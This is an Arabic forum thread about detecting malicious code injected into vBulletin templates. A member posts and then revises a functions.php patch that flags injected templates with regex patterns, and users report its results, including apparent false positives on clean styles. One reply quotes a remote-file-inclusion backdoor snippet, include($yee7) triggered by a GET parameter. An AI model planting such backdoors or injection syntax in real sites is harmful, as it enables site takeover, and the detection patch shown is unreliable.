تسلم استاذي العندليب على جهودك في خدمة المنتديات العربية
قمت بالتجربة على النسخة 3.6.4
وظهرت صفحة بيضاء بها السطر التالي :
Warning: Division by zero in /includes/functions.php(5043) : eval()'d code on line 88
من هذا زيرو :con2: :anger1:
| |
تسلم استاذي العندليب على جهودك في خدمة المنتديات العربية
قمت بالتجربة على النسخة 3.6.4
وظهرت صفحة بيضاء بها السطر التالي :
Warning: Division by zero in /includes/functions.php(5043) : eval()'d code on line 88
من هذا زيرو :con2: :anger1:
السلام عليكم ورحمة الله وبركاته
جزاك الله خيراً أخي العندليب
لكن هل هذا الموضوع ينطبق أيضاً على نظام قوالب smarty ؟
تحية لك
حياكم الله جميعاً وأشكركم على الرد وأتمنى التفاعل أكثر مع الموضوع
فأرى أن الموضوع ذو أهميه كبرى ويمس شريحه كبيره من البرمجيات المستخدمه في المواقع
وأشكر كل الأخوان الذين تفضلوا بالرد والشكر وهذا من لطفهم
الأخ البروفيسور إن شاء الله سأتابع ماذكرت بخصوص مشكلة المشروع الذي تفضلت بذكر إسمه.
الأخ البـ أحمد ـرنس
ياليت تعيد صياغة اسئلتك بشكل واضح
والله مافهمت كل كلامك
واذا تبي تبحث عن التلغيم في القوالب فقم بعمل الترقيع فاذا ظهرت صفحه بيضاء فهذا يعني أن هناك قالب مصاب ويجب عليك إغلاق منتداك وفحصه.
الأخ الجنيدي
حسب علمي أن نظام Smarty يخزن القوالب على ملفات ويتم إستدعاء المتغيرات بداخل القوالب بالأقواس التي أشرنا لها بالطريقه الثانيه للتلغيم فأنا لم أقم بأي تطبيق على هذا النظام وأترك لك التجربه واخبارنا بالنتائج فالبرامج كثيره التي تعمل بنفس الكيفيه لذلك ذكرت البرمجيات التي تعمل عليها أساليب التلغيم.
بالتوفيق
__________________
al3ndaleeb[@]uk2.net
بارك الله فيك اخوي العندليب وجزاك الله خير
اخوي جربته في الاباتشي واطلعت الصفحه بيضاء
للعلم النسخه منزوعة كود التبليغ
وياليت لو تذكر ماهو القالب اللي يتم التلغيم فيه
مع العلم ان اغلب المخترقين يلغمون FORUMHOME
ودمت بخير
اشكرك اخي العندليب على هذا لموضوع المفيد
وبصراحة قمت بالترقيع للملف functions.php بالكود الموجود للاستبدال
وما اشتغل المنتدى واعطاني هذه العبارة
Warning: Division by zero in /includes/functions.php(4382) : eval()'d code on line 10
ترى ماهي المشكلة علما اصدار المنتدى Powered by vBulletin Version 3.5.4
اتمنى منك المساعدة في الحل ولك تحياتي
السلام عليكم ورحمة الله وبركاته
يا أخواني الترقيع الذي أدرجته للـ vbulletin ذكرت بأنه ليس ترقيعاً كاملاً وهو مجرد مساعد .
والغرض منه معرفة ما إذا كان المنتدى مصاب بأحد الطريقتين في التلغيم أو لا
وبمجرد ظهور صفحه بيضاء فهذا يدل على أن احد قوالب المنتدى تم تلغيمه
والأخوان الذين ذكروا بأنهم شاهدوا رسالة الخطأ بعد التركيب فهذا يدل على أن هناك قالب ملغم
الترقيع يحتاج لتطوير ومناقشه ولم أجد أحداً يناقشني فيه من الأخوان هنا!
تطوير للترقيع بدلاً من الترقيع الأول:
1- إفتح ملف functions.php وابحث عن السطر التالي:
2- قم بإستبدال السطر بما يلي:كود PHP:return $template;
3- قم بحفظ الملف ورفعه.كود PHP:$temp = preg_replace('#[\r|\n|\s|\t|\0]#i', '', $template);
if(preg_match('#["\.|\{\$|\}\}]#i', $temp)){
$template = "<b>$templatename</b> injected.<br><br>you must repair this template.".'{${exit()}}';
}
return $template;
يساعد هذا التطوير للترقيع بعرض إسم القالب المصاب قبل تنفيذه والتوقف .
قمت بتجربته على النسخ الجديده 3.5 و 3.6 والنسخ القديمه 3.0 أيضاً.
موفقين وبانتظار مداخلاتكم
__________________
al3ndaleeb[@]uk2.net
جزاك الله كل خير اخي العندليب
معلومات مفيدة جدا والف شكراً على كل ماتقدمه لنا من جديد ونصائح مفيدة
جربت الترقيع أو الأكواد المساعدة التى ذكرتها على السيرفر الشخصي وأيضا على الموقع مباشرة
وبصراحة جعلتنى اشك في كل الإستايلات لدي ( حتى التى صممتها بنفسي من الصفر على الستايل الإفتراضي )!
ظهرت الصفحة البيضاء التى تقول عنها مع جميع الإستايلات ـ وجربتها ايضا ولم يكن متواجد على المنتدى غير الستايل الإفتراضي فقط بدون اى تعديل وظهرت ايضا فكيف يحدث ذلك ؟؟
النسخه المستخدمة كانت 364 "منزوعه الكود" ..
أنا جديد على php ومعلوماتي محدودة فيها ، ولكن ربما هذا الكود المساعد فيه خطأ وليس هو الحل للكشف على قوالب المنتدى والا اصبحت كل الإستايلات مــلغــومــة!
ومنتظرين أحد من خبراء php لمناقشتك ولتطوير الكود كما قلت لنصل لحل سليم - ان وجد - لفحص الإستايل ..
__________________
كتوم في المصنع {...}
ألف رحمة على والديك حليت مشكلتي الله يجزيك خير
السلام عليكم ورحمة الله وبركاته
وحياكم الله وبارك الله فيكم ووفقكم الله لكل مايحب ويرضى
الأخ ca2om شكرا لمداخلتك
هذا في نظري أحد الأسباب الأخرى التي لم نذكرهاالنسخه المستخدمة كانت 364 "منزوعه الكود" ..
فهل القوالب الملغومه تنتشر فقط من الإستايلات ؟
بالعكس لا طبعاً
فالنسخ المنزوعه نسخ غير مضمونه من وجهة نظري والله العالم بما فيها ومن هو القائم على نزع أكوادها ومن أين مصدرها فأغلب هذه النسخ متداوله بين الكل ومنتشره على أكثر من موقع لذلك فأنا أفضل الحصول على نسخه أصليه عند بدء أي منتدى وبعد ذلك أقوم بنزع أكواد التبليغ بنفسي وأتابع كل الأمور الأمنيه المتعلقه بالمنتدى.
طيب ياليت تجرب الترقيع الأخير بعد التطوير وتخبرنا عن نتيجتك وماهي القوالب التي كانت مصابه وماهو محتواها ونناقش معاً أين مكمن الخلل.أنا جديد على php ومعلوماتي محدودة فيها ، ولكن ربما هذا الكود المساعد فيه خطأ وليس هو الحل للكشف على قوالب المنتدى والا اصبحت كل الإستايلات مــلغــومــة!
ومنتظرين أحد من خبراء php لمناقشتك ولتطوير الكود كما قلت لنصل لحل سليم - ان وجد - لفحص الإستايل ..
موفقين جميعاً
__________________
al3ndaleeb[@]uk2.net
الله يعطيك العافية عندل
والحمدلله كل ستايلاتي من تصميمي ومعدل على ستايل الشركة الاصلي
مااخوفي الا من الهاكات
بس اللــــه يخارجنا
__________________
سبحان الله ... اللهم اني استغفرك و اتوب الليك
سيرفرات موقعي على ليكود ويب
أشكرك مرة أخري وهذا ماحدث بالفعل أخي العندليب ـ وتمت التجربه على التطوير الأخير للكود ونفس الأمر ظهور الصفحة البيضاء فقط بدون اى توضيح عن القالب المصاب او الخلل أين ..المشاركة الأصلية كتبت بواسطة العندليب
__________________
كتوم في المصنع {...}
صدقت
الكوود الذي أدرجته به خطأ طفيف فعذراً على ذلك وجل من لا يسهو
هذا هو الكوود الصحيح بعد التطوير
ومنتظر التجربه.كود PHP:$temp = preg_replace('#[\r|\n|\s|\t|\0]#i', '', $template);
if(preg_match('#["\.|\{\$|\}\}]#i', $temp)){
error_reporting(0);
$template = "<b>$templatename</b> injected.<br><br>you must fix this template.";
$template = ' {${print(\''.$template.'\')}}{${exit()}}';
}
return $template;
موفق
__________________
al3ndaleeb[@]uk2.net
يعطيك العافيه اخوي العندليب انا جربت طريقتك وطلع لي اسم التمبلت : lastthreadshower
شنو الحل بالتمبلت هذا وشلون اعرف وين التلغيم؟؟
هلا اخى الكريم العندليب
لى اضافة وهى
وجدتها فى بعض مواقع هاكر اجنبية مع شرح طريقة استغلال الامركود PHP:if($_GET[yee7]) {
include($yee7);
exit;
}
طبعا الاستغلال عبر شل من خارج الموقع
هلا العندليب
انا جربته وطلعت لى صفحه بيضاء مكتبوب فيها
option injected.
you must fix this template.
ايش الحل
__________________
إستخدم ملفك الخاص لكتابة توقيعك
ضوابط المشاركة
رد مع اقتباس
